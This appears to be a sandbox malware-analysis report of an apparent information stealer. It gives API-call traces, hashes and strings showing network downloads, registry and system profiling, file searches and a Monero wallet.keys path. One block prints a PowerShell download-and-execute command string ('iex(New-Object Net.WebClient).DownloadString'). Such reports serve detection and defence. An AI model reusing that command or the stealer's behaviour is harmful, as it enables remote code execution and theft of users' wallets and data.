                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                                • Instruction ID: 6cea885e9e9763fa506887a533aa9cc9f5c447493edcbe045ce7fb046804b304
                                • Opcode Fuzzy Hash: 872c343b34161eebcfab5d88777b38f21099c7f00402f2cd3478d1871aeed9b6
                                • Instruction Fuzzy Hash: E6F05E70908209EFD3889FE0E909B2C7B74FB45703F040198E60D87290DA745F829B97
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00934FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00934FD1
                                • InternetOpenA.WININET(00950DDF,00000000,00000000,00000000,00000000), ref: 00934FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00935011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00935041
                                • InternetCloseHandle.WININET(?), ref: 009350B9
                                • InternetCloseHandle.WININET(?), ref: 009350C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 022dd9b2bf9106c0b2b18f7db1097c9c26b3c5742a7570f89c495c18327884f0
                                • Instruction ID: a982952f342d708185a67f4acbcaccacb19188840dd7627c26429f997a56ea37
                                • Opcode Fuzzy Hash: 022dd9b2bf9106c0b2b18f7db1097c9c26b3c5742a7570f89c495c18327884f0
                                • Instruction Fuzzy Hash: B63119B4A40218ABDB64CF54DC85BDCB7B4EB88704F1081D8FA09A7280CB746EC58F99
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015BF5A8,00000000,?,00950E2C,00000000,?,00000000), ref: 00948130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00948158
                                • wsprintfA.USER32 ref: 009481AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                                • Instruction ID: 88aa9ccf6dfc2862786d6957686e13484d38c00e966458828e76932e676f4886
                                • Opcode Fuzzy Hash: 9f30998a15c3ca47ae9a3de843b8c4714630a91ef4359eb4781c9eb07b7477aa
                                • Instruction Fuzzy Hash: C421FEB1E44218ABDB00DFD5DC49FAFB7B8FB88B14F104519F605BB280DB7869018BA5
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                                • wsprintfA.USER32 ref: 00948459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,015BF410,00000000,000F003F,?,00000400), ref: 009484EC
                                • lstrlen.KERNEL32(?), ref: 00948501
                                • RegQueryValueExA.ADVAPI32(00000000,015BF3B0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00950B34), ref: 00948599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948608
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                                • Instruction ID: c279d307341c546c139fcc1f9e2b5bf024ed3a76039cdaa74fec16845889a1ab
                                • Opcode Fuzzy Hash: 2faf2d7e71e690e97b99da330024e7815e1d8f6fda5e77046e9d7664cdbdd126
                                • Instruction Fuzzy Hash: F821E7B1950218ABDB64DB54DC85FE9B3B8FB88704F00C598E609A7180DF71AA85CFD5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009476A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009476AB
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC438,00000000,00020119,00000000), ref: 009476DD
                                • RegQueryValueExA.ADVAPI32(00000000,015BF3F8,00000000,00000000,?,000000FF), ref: 009476FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00947708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                                • Instruction ID: 5f9b5a8ebc127afed2614fbeef4c67ac4873f25543e51646a63307c4c752567f
                                • Opcode Fuzzy Hash: bede20ba15109c0659173b02a57f68f5196b292f9e2297d0bdc772ca0afbcee0
                                • Instruction Fuzzy Hash: 02014FB5A44208BBDB00DBE4DC59F6DB7BCEB88701F104454FA0897291EB7499448B52
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0094773B
                                • RegOpenKeyExA.ADVAPI32(80000002,015AC438,00000000,00020119,009476B9), ref: 0094775B
                                • RegQueryValueExA.ADVAPI32(009476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0094777A
                                • RegCloseKey.ADVAPI32(009476B9), ref: 00947784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                                • Instruction ID: cd03750ae59f274a97928e6944c9052fb6d9e7488645c4408506e481f81d07bc
                                • Opcode Fuzzy Hash: 438eb817bceb6ba0e5b950d85feb736e8882bd4afd5d57c14059b01128c3c6ea
                                • Instruction Fuzzy Hash: FF0117F5A40308BBD750DFE4DC49FAEB7B8EB84705F104555FA09A72C1DB705A408B52
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                                • Instruction ID: 274620ba0bfc716ec1011ac9a8704f8d4a342d41135a41948a8dbe0cc225881f
                                • Opcode Fuzzy Hash: 61e133aef6c726cb3e149aa5816c1413b27bce4d24682f699fd871cfa03f35b6
                                • Instruction Fuzzy Hash: 74311C74A00209EFDF14DF94D985FAE77B9FF88341F108258E915A7290DB74AA81CFA1
                                APIs
                                • lstrcat.KERNEL32(?,015BF638), ref: 009447DB
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944801
                                • lstrcat.KERNEL32(?,?), ref: 00944820
                                • lstrcat.KERNEL32(?,?), ref: 00944834
                                • lstrcat.KERNEL32(?,015AB720), ref: 00944847
                                • lstrcat.KERNEL32(?,?), ref: 0094485B
                                • lstrcat.KERNEL32(?,015BE950), ref: 0094486F
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948D90: GetFileAttributesA.KERNEL32(00000000,?,00931B54,?,?,0095564C,?,?,00950E1F), ref: 00948D9F
                                  • Part of subcall function 00944570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                  • Part of subcall function 00944570: RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                  • Part of subcall function 00944570: wsprintfA.USER32 ref: 009445A6
                                  • Part of subcall function 00944570: FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                                • Instruction ID: 0a887099ca7be99f67b51fd8c85a6fc515f32f1c9d7e78b7e67f409850345b10
                                • Opcode Fuzzy Hash: 548bf943f05bc5fae1c7e23359e6d5baa8b413087c674ad3490840a6dc1ac4af
                                • Instruction Fuzzy Hash: 6D3141B290021867CB54FBB0DC85FEE737CAB98700F404989F35996191EE74A7C98B96
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00942D85
                                Strings
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00942D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00942CC4
                                • ')", xrefs: 00942CB3
                                • <, xrefs: 00942D39
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                                • Instruction ID: 8e3bdcb1562a49851e8f7ded10a43564eff67b3c59771b9d607be2e5fad8b45e
                                • Opcode Fuzzy Hash: c4eaab5251fd0dacf35a727a29254fbddacee558d975840e670c42eafe30329f
                                • Instruction Fuzzy Hash: 9941CA71C502089AEB14EBA0C892FEDBB78BF94304F504119F416A7192EF746A4ACF96
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00939F41
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: a56b14cf1c7bfd0ef21c35db7af8512d8ce6544157e67d024e73f3f5a1937038
                                • Instruction ID: 715416a159a387f8acac837a5d32f50f93649a2177a3235c04ed3bea4c54866d
                                • Opcode Fuzzy Hash: a56b14cf1c7bfd0ef21c35db7af8512d8ce6544157e67d024e73f3f5a1937038
                                • Instruction Fuzzy Hash: DB612D71A50248ABDB28EFA4CC96FED7775AF85304F008518F90A5B291EB746A05CF52
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,015BE850,00000000,00020119,?), ref: 009440F4
